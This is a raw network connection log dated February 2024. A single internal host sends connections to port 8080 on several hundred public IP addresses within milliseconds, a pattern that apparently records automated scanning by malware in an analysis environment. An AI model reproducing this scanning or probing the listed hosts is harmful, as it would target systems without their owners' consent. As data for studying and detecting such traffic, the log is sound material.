Feb 14, 2024 09:28:46.385901928 CET	6752	8080	192.168.2.15	94.241.149.198
Feb 14, 2024 09:28:46.385905981 CET	6752	8080	192.168.2.15	95.80.218.179
Feb 14, 2024 09:28:46.385912895 CET	6752	8080	192.168.2.15	31.54.124.128
Feb 14, 2024 09:28:46.385912895 CET	6752	8080	192.168.2.15	31.43.240.146
Feb 14, 2024 09:28:46.385912895 CET	6752	8080	192.168.2.15	31.186.217.190
Feb 14, 2024 09:28:46.385912895 CET	6752	8080	192.168.2.15	95.113.153.225
Feb 14, 2024 09:28:46.385912895 CET	6752	8080	192.168.2.15	85.93.27.207
Feb 14, 2024 09:28:46.385920048 CET	6752	8080	192.168.2.15	94.237.14.125
Feb 14, 2024 09:28:46.385942936 CET	6752	8080	192.168.2.15	62.246.108.215
Feb 14, 2024 09:28:46.385946989 CET	6752	8080	192.168.2.15	85.232.201.85
Feb 14, 2024 09:28:46.385946989 CET	6752	8080	192.168.2.15	62.168.124.95
Feb 14, 2024 09:28:46.385963917 CET	6752	8080	192.168.2.15	94.131.14.214
Feb 14, 2024 09:28:46.385989904 CET	6752	8080	192.168.2.15	62.192.250.162
Feb 14, 2024 09:28:46.386003971 CET	6752	8080	192.168.2.15	31.82.77.142
Feb 14, 2024 09:28:46.386007071 CET	6752	8080	192.168.2.15	85.181.239.187
Feb 14, 2024 09:28:46.386018038 CET	6752	8080	192.168.2.15	94.3.103.99
Feb 14, 2024 09:28:46.386020899 CET	6752	8080	192.168.2.15	95.197.224.69
Feb 14, 2024 09:28:46.386020899 CET	6752	8080	192.168.2.15	94.189.54.136
Feb 14, 2024 09:28:46.386037111 CET	6752	8080	192.168.2.15	62.76.118.121
Feb 14, 2024 09:28:46.386038065 CET	6752	8080	192.168.2.15	85.233.203.251
Feb 14, 2024 09:28:46.386054039 CET	6752	8080	192.168.2.15	95.113.40.202
Feb 14, 2024 09:28:46.386063099 CET	6752	8080	192.168.2.15	62.122.100.238
Feb 14, 2024 09:28:46.386080027 CET	6752	8080	192.168.2.15	94.51.125.171
Feb 14, 2024 09:28:46.386082888 CET	6752	8080	192.168.2.15	62.181.15.113
Feb 14, 2024 09:28:46.386101961 CET	6752	8080	192.168.2.15	94.56.97.242
Feb 14, 2024 09:28:46.386102915 CET	6752	8080	192.168.2.15	62.111.210.183
Feb 14, 2024 09:28:46.386116028 CET	6752	8080	192.168.2.15	85.11.153.139
Feb 14, 2024 09:28:46.386127949 CET	6752	8080	192.168.2.15	85.140.112.190
Feb 14, 2024 09:28:46.386137009 CET	6752	8080	192.168.2.15	62.56.232.232
Feb 14, 2024 09:28:46.386152983 CET	6752	8080	192.168.2.15	95.116.154.95
Feb 14, 2024 09:28:46.386164904 CET	6752	8080	192.168.2.15	62.79.65.213
Feb 14, 2024 09:28:46.386168957 CET	6752	8080	192.168.2.15	94.186.90.79
Feb 14, 2024 09:28:46.386182070 CET	6752	8080	192.168.2.15	62.113.155.102
Feb 14, 2024 09:28:46.386184931 CET	6752	8080	192.168.2.15	95.174.3.60
Feb 14, 2024 09:28:46.386200905 CET	6752	8080	192.168.2.15	31.6.128.161
Feb 14, 2024 09:28:46.386214018 CET	6752	8080	192.168.2.15	31.42.111.181
Feb 14, 2024 09:28:46.386214018 CET	6752	8080	192.168.2.15	85.39.178.145
Feb 14, 2024 09:28:46.386226892 CET	6752	8080	192.168.2.15	95.95.58.14
Feb 14, 2024 09:28:46.386231899 CET	6752	8080	192.168.2.15	95.17.37.241
Feb 14, 2024 09:28:46.386253119 CET	6752	8080	192.168.2.15	62.169.71.206
Feb 14, 2024 09:28:46.386253119 CET	6752	8080	192.168.2.15	95.129.128.147
Feb 14, 2024 09:28:46.386255026 CET	6752	8080	192.168.2.15	94.90.236.208
Feb 14, 2024 09:28:46.386256933 CET	6752	8080	192.168.2.15	31.96.14.152
Feb 14, 2024 09:28:46.386280060 CET	6752	8080	192.168.2.15	85.7.35.172
Feb 14, 2024 09:28:46.386296034 CET	6752	8080	192.168.2.15	95.190.155.181
Feb 14, 2024 09:28:46.386302948 CET	6752	8080	192.168.2.15	95.105.56.11
Feb 14, 2024 09:28:46.386302948 CET	6752	8080	192.168.2.15	31.22.18.145
Feb 14, 2024 09:28:46.386302948 CET	6752	8080	192.168.2.15	85.100.8.238
Feb 14, 2024 09:28:46.386302948 CET	6752	8080	192.168.2.15	31.212.24.230
Feb 14, 2024 09:28:46.386307001 CET	6752	8080	192.168.2.15	85.19.56.104
Feb 14, 2024 09:28:46.386331081 CET	6752	8080	192.168.2.15	62.82.206.96
Feb 14, 2024 09:28:46.386349916 CET	6752	8080	192.168.2.15	85.199.105.29
Feb 14, 2024 09:28:46.386351109 CET	6752	8080	192.168.2.15	62.237.166.65
Feb 14, 2024 09:28:46.386351109 CET	6752	8080	192.168.2.15	94.16.12.160
Feb 14, 2024 09:28:46.386351109 CET	6752	8080	192.168.2.15	95.190.243.254
Feb 14, 2024 09:28:46.386351109 CET	6752	8080	192.168.2.15	94.114.150.64
Feb 14, 2024 09:28:46.386353970 CET	6752	8080	192.168.2.15	95.69.62.212
Feb 14, 2024 09:28:46.386358976 CET	6752	8080	192.168.2.15	62.14.160.142
Feb 14, 2024 09:28:46.386367083 CET	6752	8080	192.168.2.15	31.65.138.36
Feb 14, 2024 09:28:46.386367083 CET	6752	8080	192.168.2.15	85.126.146.109
Feb 14, 2024 09:28:46.386374950 CET	6752	8080	192.168.2.15	31.62.222.248
Feb 14, 2024 09:28:46.386389017 CET	6752	8080	192.168.2.15	31.128.245.219
Feb 14, 2024 09:28:46.386393070 CET	6752	8080	192.168.2.15	31.124.122.243
Feb 14, 2024 09:28:46.386398077 CET	6752	8080	192.168.2.15	31.195.24.246
Feb 14, 2024 09:28:46.386408091 CET	6752	8080	192.168.2.15	94.86.26.227
Feb 14, 2024 09:28:46.386426926 CET	6752	8080	192.168.2.15	62.58.17.179
Feb 14, 2024 09:28:46.386426926 CET	6752	8080	192.168.2.15	62.127.206.199
Feb 14, 2024 09:28:46.386435986 CET	6752	8080	192.168.2.15	62.171.45.49
Feb 14, 2024 09:28:46.386440992 CET	6752	8080	192.168.2.15	62.169.185.65
Feb 14, 2024 09:28:46.386449099 CET	6752	8080	192.168.2.15	85.145.241.134
Feb 14, 2024 09:28:46.386441946 CET	6752	8080	192.168.2.15	85.99.93.125
Feb 14, 2024 09:28:46.386454105 CET	6752	8080	192.168.2.15	85.1.217.155
Feb 14, 2024 09:28:46.386441946 CET	6752	8080	192.168.2.15	94.67.2.185
Feb 14, 2024 09:28:46.386464119 CET	6752	8080	192.168.2.15	85.15.9.100
Feb 14, 2024 09:28:46.386478901 CET	6752	8080	192.168.2.15	62.223.8.248
Feb 14, 2024 09:28:46.386486053 CET	6752	8080	192.168.2.15	85.93.16.110
Feb 14, 2024 09:28:46.386501074 CET	6752	8080	192.168.2.15	85.101.255.229
Feb 14, 2024 09:28:46.386503935 CET	6752	8080	192.168.2.15	31.44.21.159
Feb 14, 2024 09:28:46.386512041 CET	6752	8080	192.168.2.15	94.195.217.239
Feb 14, 2024 09:28:46.386512995 CET	6752	8080	192.168.2.15	85.198.30.167
Feb 14, 2024 09:28:46.386523962 CET	6752	8080	192.168.2.15	31.222.184.214
Feb 14, 2024 09:28:46.386538029 CET	6752	8080	192.168.2.15	95.1.233.166
Feb 14, 2024 09:28:46.386542082 CET	6752	8080	192.168.2.15	62.142.27.155
Feb 14, 2024 09:28:46.386547089 CET	6752	8080	192.168.2.15	95.150.210.52
Feb 14, 2024 09:28:46.386552095 CET	6752	8080	192.168.2.15	85.123.104.62
Feb 14, 2024 09:28:46.386564970 CET	6752	8080	192.168.2.15	31.8.92.80
Feb 14, 2024 09:28:46.386576891 CET	6752	8080	192.168.2.15	95.94.7.139
Feb 14, 2024 09:28:46.386590004 CET	6752	8080	192.168.2.15	62.34.81.159
Feb 14, 2024 09:28:46.386598110 CET	6752	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:46.386606932 CET	6752	8080	192.168.2.15	95.3.52.237
Feb 14, 2024 09:28:46.386617899 CET	6752	8080	192.168.2.15	94.219.179.112
Feb 14, 2024 09:28:46.386631966 CET	6752	8080	192.168.2.15	95.111.43.204
Feb 14, 2024 09:28:46.386631966 CET	6752	8080	192.168.2.15	94.45.170.250
Feb 14, 2024 09:28:46.386647940 CET	6752	8080	192.168.2.15	85.242.182.140
Feb 14, 2024 09:28:46.386658907 CET	6752	8080	192.168.2.15	94.129.34.100
Feb 14, 2024 09:28:46.386667967 CET	6752	8080	192.168.2.15	85.172.19.26
Feb 14, 2024 09:28:46.386670113 CET	6752	8080	192.168.2.15	31.56.220.224
Feb 14, 2024 09:28:46.386681080 CET	6752	8080	192.168.2.15	85.161.149.82
Feb 14, 2024 09:28:46.386708975 CET	6752	8080	192.168.2.15	94.85.70.242
Feb 14, 2024 09:28:46.386725903 CET	6752	8080	192.168.2.15	94.215.83.25
Feb 14, 2024 09:28:46.386739969 CET	6752	8080	192.168.2.15	31.195.106.179
Feb 14, 2024 09:28:46.386755943 CET	6752	8080	192.168.2.15	62.154.77.227
Feb 14, 2024 09:28:46.386758089 CET	6752	8080	192.168.2.15	94.56.177.215
Feb 14, 2024 09:28:46.386778116 CET	6752	8080	192.168.2.15	31.187.88.119
Feb 14, 2024 09:28:46.386776924 CET	6752	8080	192.168.2.15	94.204.254.122
Feb 14, 2024 09:28:46.386792898 CET	6752	8080	192.168.2.15	62.154.134.4
Feb 14, 2024 09:28:46.386801004 CET	6752	8080	192.168.2.15	95.8.249.64
Feb 14, 2024 09:28:46.386821985 CET	6752	8080	192.168.2.15	85.101.86.192
Feb 14, 2024 09:28:46.386825085 CET	6752	8080	192.168.2.15	85.39.13.70
Feb 14, 2024 09:28:46.386825085 CET	6752	8080	192.168.2.15	62.214.56.192
Feb 14, 2024 09:28:46.386837959 CET	6752	8080	192.168.2.15	95.41.224.129
Feb 14, 2024 09:28:46.386854887 CET	6752	8080	192.168.2.15	85.33.238.13
Feb 14, 2024 09:28:46.386866093 CET	6752	8080	192.168.2.15	94.6.253.61
Feb 14, 2024 09:28:46.386876106 CET	6752	8080	192.168.2.15	95.247.78.141
Feb 14, 2024 09:28:46.386892080 CET	6752	8080	192.168.2.15	85.75.123.207
Feb 14, 2024 09:28:46.386892080 CET	6752	8080	192.168.2.15	85.255.187.23
Feb 14, 2024 09:28:46.386904001 CET	6752	8080	192.168.2.15	85.46.147.217
Feb 14, 2024 09:28:46.386917114 CET	6752	8080	192.168.2.15	95.217.39.68
Feb 14, 2024 09:28:46.386924028 CET	6752	8080	192.168.2.15	31.55.86.146
Feb 14, 2024 09:28:46.386935949 CET	6752	8080	192.168.2.15	85.22.227.38
Feb 14, 2024 09:28:46.386941910 CET	6752	8080	192.168.2.15	31.69.101.107
Feb 14, 2024 09:28:46.386961937 CET	6752	8080	192.168.2.15	85.206.174.248
Feb 14, 2024 09:28:46.386962891 CET	6752	8080	192.168.2.15	31.55.249.141
Feb 14, 2024 09:28:46.386975050 CET	6752	8080	192.168.2.15	85.21.88.240
Feb 14, 2024 09:28:46.386981010 CET	6752	8080	192.168.2.15	95.148.43.173
Feb 14, 2024 09:28:46.387006044 CET	6752	8080	192.168.2.15	95.16.102.121
Feb 14, 2024 09:28:46.387012959 CET	6752	8080	192.168.2.15	85.90.29.64
Feb 14, 2024 09:28:46.387023926 CET	6752	8080	192.168.2.15	95.49.70.145
Feb 14, 2024 09:28:46.387023926 CET	6752	8080	192.168.2.15	94.202.114.68
Feb 14, 2024 09:28:46.387027025 CET	6752	8080	192.168.2.15	31.69.64.189
Feb 14, 2024 09:28:46.387027025 CET	6752	8080	192.168.2.15	85.197.93.84
Feb 14, 2024 09:28:46.387039900 CET	6752	8080	192.168.2.15	94.209.186.147
Feb 14, 2024 09:28:46.387047052 CET	6752	8080	192.168.2.15	94.206.37.10
Feb 14, 2024 09:28:46.387056112 CET	6752	8080	192.168.2.15	85.141.35.26
Feb 14, 2024 09:28:46.387078047 CET	6752	8080	192.168.2.15	85.80.199.65
Feb 14, 2024 09:28:46.387079000 CET	6752	8080	192.168.2.15	94.171.127.201
Feb 14, 2024 09:28:46.387098074 CET	6752	8080	192.168.2.15	95.220.187.176
Feb 14, 2024 09:28:46.387110949 CET	6752	8080	192.168.2.15	31.153.75.209
Feb 14, 2024 09:28:46.387115002 CET	6752	8080	192.168.2.15	95.112.192.38
Feb 14, 2024 09:28:46.387124062 CET	6752	8080	192.168.2.15	31.4.213.192
Feb 14, 2024 09:28:46.387140036 CET	6752	8080	192.168.2.15	62.127.34.129
Feb 14, 2024 09:28:46.387160063 CET	6752	8080	192.168.2.15	95.203.145.244
Feb 14, 2024 09:28:46.387160063 CET	6752	8080	192.168.2.15	95.232.200.109
Feb 14, 2024 09:28:46.387161970 CET	6752	8080	192.168.2.15	85.104.198.84
Feb 14, 2024 09:28:46.387176991 CET	6752	8080	192.168.2.15	95.219.97.12
Feb 14, 2024 09:28:46.387192965 CET	6752	8080	192.168.2.15	31.102.94.213
Feb 14, 2024 09:28:46.387198925 CET	6752	8080	192.168.2.15	94.97.19.73
Feb 14, 2024 09:28:46.387224913 CET	6752	8080	192.168.2.15	62.155.151.107
Feb 14, 2024 09:28:46.387224913 CET	6752	8080	192.168.2.15	85.231.102.101
Feb 14, 2024 09:28:46.387228012 CET	6752	8080	192.168.2.15	95.191.200.176
Feb 14, 2024 09:28:46.387228966 CET	6752	8080	192.168.2.15	31.132.28.67
Feb 14, 2024 09:28:46.387229919 CET	6752	8080	192.168.2.15	62.234.173.252
Feb 14, 2024 09:28:46.387229919 CET	6752	8080	192.168.2.15	85.168.227.62
Feb 14, 2024 09:28:46.387243032 CET	6752	8080	192.168.2.15	95.184.79.124
Feb 14, 2024 09:28:46.387245893 CET	6752	8080	192.168.2.15	94.195.16.103
Feb 14, 2024 09:28:46.387255907 CET	6752	8080	192.168.2.15	62.226.74.94
Feb 14, 2024 09:28:46.387269974 CET	6752	8080	192.168.2.15	62.224.232.54
Feb 14, 2024 09:28:46.387273073 CET	6752	8080	192.168.2.15	85.187.59.255
Feb 14, 2024 09:28:46.387280941 CET	6752	8080	192.168.2.15	95.197.167.174
Feb 14, 2024 09:28:46.387280941 CET	6752	8080	192.168.2.15	62.120.97.4
Feb 14, 2024 09:28:46.387300968 CET	6752	8080	192.168.2.15	62.36.134.179
Feb 14, 2024 09:28:46.387309074 CET	6752	8080	192.168.2.15	62.53.12.136
Feb 14, 2024 09:28:46.387320042 CET	6752	8080	192.168.2.15	62.244.90.111
Feb 14, 2024 09:28:46.387320042 CET	6752	8080	192.168.2.15	62.62.230.128
Feb 14, 2024 09:28:46.387331009 CET	6752	8080	192.168.2.15	31.100.53.208
Feb 14, 2024 09:28:46.387337923 CET	6752	8080	192.168.2.15	95.93.108.189
Feb 14, 2024 09:28:46.387362957 CET	6752	8080	192.168.2.15	31.146.108.133
Feb 14, 2024 09:28:46.387370110 CET	6752	8080	192.168.2.15	85.28.224.170
Feb 14, 2024 09:28:46.387377977 CET	6752	8080	192.168.2.15	62.120.243.142
Feb 14, 2024 09:28:46.387397051 CET	6752	8080	192.168.2.15	94.32.90.181
Feb 14, 2024 09:28:46.387406111 CET	6752	8080	192.168.2.15	85.146.155.19
Feb 14, 2024 09:28:46.387408018 CET	6752	8080	192.168.2.15	85.231.248.94
Feb 14, 2024 09:28:46.387428999 CET	6752	8080	192.168.2.15	31.107.134.226
Feb 14, 2024 09:28:46.387438059 CET	6752	8080	192.168.2.15	95.219.213.150
Feb 14, 2024 09:28:46.387444973 CET	6752	8080	192.168.2.15	31.236.233.23
Feb 14, 2024 09:28:46.387454987 CET	6752	8080	192.168.2.15	95.196.183.143
Feb 14, 2024 09:28:46.387468100 CET	6752	8080	192.168.2.15	95.175.197.15
Feb 14, 2024 09:28:46.387470961 CET	6752	8080	192.168.2.15	31.123.176.211
Feb 14, 2024 09:28:46.387478113 CET	6752	8080	192.168.2.15	62.203.202.24
Feb 14, 2024 09:28:46.387481928 CET	6752	8080	192.168.2.15	94.121.83.6
Feb 14, 2024 09:28:46.387502909 CET	6752	8080	192.168.2.15	85.58.156.77
Feb 14, 2024 09:28:46.387520075 CET	6752	8080	192.168.2.15	62.204.108.239
Feb 14, 2024 09:28:46.387531042 CET	6752	8080	192.168.2.15	31.131.3.103
Feb 14, 2024 09:28:46.387536049 CET	6752	8080	192.168.2.15	31.114.69.85
Feb 14, 2024 09:28:46.387552977 CET	6752	8080	192.168.2.15	31.9.225.58
Feb 14, 2024 09:28:46.387556076 CET	6752	8080	192.168.2.15	85.85.50.122
Feb 14, 2024 09:28:46.387568951 CET	6752	8080	192.168.2.15	62.127.147.63
Feb 14, 2024 09:28:46.387576103 CET	6752	8080	192.168.2.15	94.10.163.10
Feb 14, 2024 09:28:46.387581110 CET	6752	8080	192.168.2.15	95.25.115.59
Feb 14, 2024 09:28:46.387581110 CET	6752	8080	192.168.2.15	85.122.185.192
Feb 14, 2024 09:28:46.387587070 CET	6752	8080	192.168.2.15	31.164.84.147
Feb 14, 2024 09:28:46.387598038 CET	6752	8080	192.168.2.15	95.171.181.83
Feb 14, 2024 09:28:46.387610912 CET	6752	8080	192.168.2.15	85.140.50.156
Feb 14, 2024 09:28:46.387618065 CET	6752	8080	192.168.2.15	95.43.199.163
Feb 14, 2024 09:28:46.387629986 CET	6752	8080	192.168.2.15	62.195.74.150
Feb 14, 2024 09:28:46.387653112 CET	6752	8080	192.168.2.15	62.91.249.238
Feb 14, 2024 09:28:46.387669086 CET	6752	8080	192.168.2.15	85.23.129.7
Feb 14, 2024 09:28:46.387672901 CET	6752	8080	192.168.2.15	31.21.67.235
Feb 14, 2024 09:28:46.387672901 CET	6752	8080	192.168.2.15	31.223.38.170
Feb 14, 2024 09:28:46.387681007 CET	6752	8080	192.168.2.15	95.126.85.238
Feb 14, 2024 09:28:46.387697935 CET	6752	8080	192.168.2.15	95.83.108.30
Feb 14, 2024 09:28:46.387697935 CET	6752	8080	192.168.2.15	95.177.66.37
Feb 14, 2024 09:28:46.387713909 CET	6752	8080	192.168.2.15	85.174.64.167
Feb 14, 2024 09:28:46.387729883 CET	6752	8080	192.168.2.15	95.159.21.183
Feb 14, 2024 09:28:46.387742043 CET	6752	8080	192.168.2.15	95.41.69.174
Feb 14, 2024 09:28:46.387768984 CET	6752	8080	192.168.2.15	62.7.49.129
Feb 14, 2024 09:28:46.387768984 CET	6752	8080	192.168.2.15	62.183.134.103
Feb 14, 2024 09:28:46.387768984 CET	6752	8080	192.168.2.15	62.209.219.117
Feb 14, 2024 09:28:46.387779951 CET	6752	8080	192.168.2.15	95.42.237.210
Feb 14, 2024 09:28:46.387799978 CET	6752	8080	192.168.2.15	85.80.117.45
Feb 14, 2024 09:28:46.387806892 CET	6752	8080	192.168.2.15	95.21.252.205
Feb 14, 2024 09:28:46.387819052 CET	6752	8080	192.168.2.15	85.214.6.133
Feb 14, 2024 09:28:46.387831926 CET	6752	8080	192.168.2.15	31.151.250.71
Feb 14, 2024 09:28:46.387837887 CET	6752	8080	192.168.2.15	85.130.11.67
Feb 14, 2024 09:28:46.387851000 CET	6752	8080	192.168.2.15	62.149.174.200
Feb 14, 2024 09:28:46.387861013 CET	6752	8080	192.168.2.15	85.150.197.118
Feb 14, 2024 09:28:46.387872934 CET	6752	8080	192.168.2.15	94.160.190.113
Feb 14, 2024 09:28:46.387873888 CET	6752	8080	192.168.2.15	94.74.36.73
Feb 14, 2024 09:28:46.387888908 CET	6752	8080	192.168.2.15	85.150.103.41
Feb 14, 2024 09:28:46.387900114 CET	6752	8080	192.168.2.15	94.95.98.5
Feb 14, 2024 09:28:46.387900114 CET	6752	8080	192.168.2.15	85.231.64.185
Feb 14, 2024 09:28:46.387900114 CET	6752	8080	192.168.2.15	31.248.130.224
Feb 14, 2024 09:28:46.387911081 CET	6752	8080	192.168.2.15	94.98.103.234
Feb 14, 2024 09:28:46.387927055 CET	6752	8080	192.168.2.15	31.36.1.76
Feb 14, 2024 09:28:46.387947083 CET	6752	8080	192.168.2.15	85.241.189.180
Feb 14, 2024 09:28:46.387963057 CET	6752	8080	192.168.2.15	94.80.61.19
Feb 14, 2024 09:28:46.387963057 CET	6752	8080	192.168.2.15	62.127.119.21
Feb 14, 2024 09:28:46.387963057 CET	6752	8080	192.168.2.15	95.135.168.187
Feb 14, 2024 09:28:46.387972116 CET	6752	8080	192.168.2.15	94.58.44.38
Feb 14, 2024 09:28:46.387973070 CET	6752	8080	192.168.2.15	95.139.152.20
Feb 14, 2024 09:28:46.387989998 CET	6752	8080	192.168.2.15	31.190.65.54
Feb 14, 2024 09:28:46.387989998 CET	6752	8080	192.168.2.15	95.86.254.169
Feb 14, 2024 09:28:46.388004065 CET	6752	8080	192.168.2.15	31.73.220.32
Feb 14, 2024 09:28:46.388029099 CET	6752	8080	192.168.2.15	95.224.60.37
Feb 14, 2024 09:28:46.388040066 CET	6752	8080	192.168.2.15	94.147.52.78
Feb 14, 2024 09:28:46.388046026 CET	6752	8080	192.168.2.15	95.24.81.93
Feb 14, 2024 09:28:46.388032913 CET	6752	8080	192.168.2.15	95.158.123.101
Feb 14, 2024 09:28:46.388061047 CET	6752	8080	192.168.2.15	62.172.71.183
Feb 14, 2024 09:28:46.388072968 CET	6752	8080	192.168.2.15	85.94.50.232
Feb 14, 2024 09:28:46.388076067 CET	6752	8080	192.168.2.15	62.27.228.106
Feb 14, 2024 09:28:46.388096094 CET	6752	8080	192.168.2.15	31.20.229.242
Feb 14, 2024 09:28:46.388096094 CET	6752	8080	192.168.2.15	62.127.6.6
Feb 14, 2024 09:28:46.388108015 CET	6752	8080	192.168.2.15	85.248.172.214
Feb 14, 2024 09:28:46.388111115 CET	6752	8080	192.168.2.15	95.175.0.100
Feb 14, 2024 09:28:46.388119936 CET	6752	8080	192.168.2.15	31.54.226.235
Feb 14, 2024 09:28:46.388129950 CET	6752	8080	192.168.2.15	62.18.26.141
Feb 14, 2024 09:28:46.388145924 CET	6752	8080	192.168.2.15	31.220.149.1
Feb 14, 2024 09:28:46.388158083 CET	6752	8080	192.168.2.15	94.17.167.107
Feb 14, 2024 09:28:46.388168097 CET	6752	8080	192.168.2.15	31.67.199.179
Feb 14, 2024 09:28:46.388175011 CET	6752	8080	192.168.2.15	94.43.109.221
Feb 14, 2024 09:28:46.388200045 CET	6752	8080	192.168.2.15	62.162.89.167
Feb 14, 2024 09:28:46.388200045 CET	6752	8080	192.168.2.15	94.251.129.108
Feb 14, 2024 09:28:46.388216972 CET	6752	8080	192.168.2.15	31.148.226.103
Feb 14, 2024 09:28:46.388227940 CET	6752	8080	192.168.2.15	95.173.165.193
Feb 14, 2024 09:28:46.388237953 CET	6752	8080	192.168.2.15	95.71.241.10
Feb 14, 2024 09:28:46.388237953 CET	6752	8080	192.168.2.15	31.32.41.34
Feb 14, 2024 09:28:46.388237953 CET	6752	8080	192.168.2.15	31.58.127.14
Feb 14, 2024 09:28:46.388248920 CET	6752	8080	192.168.2.15	62.202.215.176
Feb 14, 2024 09:28:46.388253927 CET	6752	8080	192.168.2.15	95.44.136.241
Feb 14, 2024 09:28:46.388264894 CET	6752	8080	192.168.2.15	85.163.151.250
Feb 14, 2024 09:28:46.388279915 CET	6752	8080	192.168.2.15	31.219.83.195
Feb 14, 2024 09:28:46.388289928 CET	6752	8080	192.168.2.15	62.193.196.149
Feb 14, 2024 09:28:46.388295889 CET	6752	8080	192.168.2.15	95.74.120.197
Feb 14, 2024 09:28:46.388299942 CET	6752	8080	192.168.2.15	85.166.201.32
Feb 14, 2024 09:28:46.388314962 CET	6752	8080	192.168.2.15	62.73.97.134
Feb 14, 2024 09:28:46.388328075 CET	6752	8080	192.168.2.15	95.55.73.49
Feb 14, 2024 09:28:46.388353109 CET	6752	8080	192.168.2.15	85.16.174.175
Feb 14, 2024 09:28:46.388367891 CET	6752	8080	192.168.2.15	31.120.5.148
Feb 14, 2024 09:28:46.388367891 CET	6752	8080	192.168.2.15	94.205.233.158
Feb 14, 2024 09:28:46.388385057 CET	6752	8080	192.168.2.15	62.90.219.88
Feb 14, 2024 09:28:46.388387918 CET	6752	8080	192.168.2.15	94.130.77.40
Feb 14, 2024 09:28:46.388400078 CET	6752	8080	192.168.2.15	94.63.81.85
Feb 14, 2024 09:28:46.388408899 CET	6752	8080	192.168.2.15	85.251.104.25
Feb 14, 2024 09:28:46.388408899 CET	6752	8080	192.168.2.15	62.91.250.167
Feb 14, 2024 09:28:46.388408899 CET	6752	8080	192.168.2.15	31.219.4.4
Feb 14, 2024 09:28:46.388413906 CET	6752	8080	192.168.2.15	31.68.88.198
Feb 14, 2024 09:28:46.388417006 CET	6752	8080	192.168.2.15	62.51.247.84
Feb 14, 2024 09:28:46.388432980 CET	6752	8080	192.168.2.15	62.59.63.47
Feb 14, 2024 09:28:46.388446093 CET	6752	8080	192.168.2.15	31.65.75.220
Feb 14, 2024 09:28:46.388448000 CET	6752	8080	192.168.2.15	95.240.230.251
Feb 14, 2024 09:28:46.388465881 CET	6752	8080	192.168.2.15	85.62.162.61
Feb 14, 2024 09:28:46.388468981 CET	6752	8080	192.168.2.15	95.162.160.69
Feb 14, 2024 09:28:46.388474941 CET	6752	8080	192.168.2.15	62.116.84.241
Feb 14, 2024 09:28:46.388478994 CET	6752	8080	192.168.2.15	94.3.238.83
Feb 14, 2024 09:28:46.388493061 CET	6752	8080	192.168.2.15	85.94.179.173
Feb 14, 2024 09:28:46.388500929 CET	6752	8080	192.168.2.15	95.60.133.125
Feb 14, 2024 09:28:46.388508081 CET	6752	8080	192.168.2.15	62.74.249.18
Feb 14, 2024 09:28:46.388524055 CET	6752	8080	192.168.2.15	95.228.214.190
Feb 14, 2024 09:28:46.388528109 CET	6752	8080	192.168.2.15	31.7.250.25
Feb 14, 2024 09:28:46.388542891 CET	6752	8080	192.168.2.15	85.102.118.234
Feb 14, 2024 09:28:46.388545036 CET	6752	8080	192.168.2.15	85.236.203.173
Feb 14, 2024 09:28:46.388559103 CET	6752	8080	192.168.2.15	85.58.249.17
Feb 14, 2024 09:28:46.388560057 CET	6752	8080	192.168.2.15	31.211.204.181
Feb 14, 2024 09:28:46.388577938 CET	6752	8080	192.168.2.15	85.184.96.181
Feb 14, 2024 09:28:46.388602972 CET	6752	8080	192.168.2.15	95.220.49.171
Feb 14, 2024 09:28:46.388603926 CET	6752	8080	192.168.2.15	31.24.162.210
Feb 14, 2024 09:28:46.388619900 CET	6752	8080	192.168.2.15	85.82.214.192
Feb 14, 2024 09:28:46.388629913 CET	6752	8080	192.168.2.15	94.236.113.179
Feb 14, 2024 09:28:46.388638020 CET	6752	8080	192.168.2.15	85.125.203.23
Feb 14, 2024 09:28:46.388641119 CET	6752	8080	192.168.2.15	95.153.42.10
Feb 14, 2024 09:28:46.388660908 CET	6752	8080	192.168.2.15	31.216.54.108
Feb 14, 2024 09:28:46.388665915 CET	6752	8080	192.168.2.15	31.137.147.197
Feb 14, 2024 09:28:46.388665915 CET	6752	8080	192.168.2.15	85.29.219.76
Feb 14, 2024 09:28:46.388685942 CET	6752	8080	192.168.2.15	31.21.165.243
Feb 14, 2024 09:28:46.388696909 CET	6752	8080	192.168.2.15	85.238.9.91
Feb 14, 2024 09:28:46.388705015 CET	6752	8080	192.168.2.15	62.123.62.4
Feb 14, 2024 09:28:46.388715982 CET	6752	8080	192.168.2.15	62.55.11.157
Feb 14, 2024 09:28:46.388731956 CET	6752	8080	192.168.2.15	62.179.233.235
Feb 14, 2024 09:28:46.388737917 CET	6752	8080	192.168.2.15	62.121.74.131
Feb 14, 2024 09:28:46.388746977 CET	6752	8080	192.168.2.15	95.55.151.245
Feb 14, 2024 09:28:46.388746977 CET	6752	8080	192.168.2.15	31.15.214.219
Feb 14, 2024 09:28:46.388761997 CET	6752	8080	192.168.2.15	94.176.21.228
Feb 14, 2024 09:28:46.388771057 CET	6752	8080	192.168.2.15	85.25.144.181
Feb 14, 2024 09:28:46.388777018 CET	6752	8080	192.168.2.15	85.73.96.191
Feb 14, 2024 09:28:46.388803959 CET	6752	8080	192.168.2.15	85.155.35.4
Feb 14, 2024 09:28:46.388812065 CET	6752	8080	192.168.2.15	94.202.56.0
Feb 14, 2024 09:28:46.388828993 CET	6752	8080	192.168.2.15	62.100.255.137
Feb 14, 2024 09:28:46.388845921 CET	6752	8080	192.168.2.15	62.126.163.84
Feb 14, 2024 09:28:46.388861895 CET	6752	8080	192.168.2.15	94.86.207.219
Feb 14, 2024 09:28:46.388871908 CET	6752	8080	192.168.2.15	31.218.144.240
Feb 14, 2024 09:28:46.388880968 CET	6752	8080	192.168.2.15	31.2.29.123
Feb 14, 2024 09:28:46.388890028 CET	6752	8080	192.168.2.15	31.172.196.130
Feb 14, 2024 09:28:46.388914108 CET	6752	8080	192.168.2.15	95.27.181.115
Feb 14, 2024 09:28:46.388914108 CET	6752	8080	192.168.2.15	62.8.204.51
Feb 14, 2024 09:28:46.388914108 CET	6752	8080	192.168.2.15	31.21.142.170
Feb 14, 2024 09:28:46.388920069 CET	6752	8080	192.168.2.15	31.203.68.107
Feb 14, 2024 09:28:46.388928890 CET	6752	8080	192.168.2.15	62.92.2.102
Feb 14, 2024 09:28:46.388941050 CET	6752	8080	192.168.2.15	95.102.216.155
Feb 14, 2024 09:28:46.388941050 CET	6752	8080	192.168.2.15	94.113.22.77
Feb 14, 2024 09:28:46.388952971 CET	6752	8080	192.168.2.15	62.131.131.183
Feb 14, 2024 09:28:46.388957024 CET	6752	8080	192.168.2.15	94.204.166.157
Feb 14, 2024 09:28:46.388967991 CET	6752	8080	192.168.2.15	31.23.147.107
Feb 14, 2024 09:28:46.388974905 CET	6752	8080	192.168.2.15	31.254.219.132
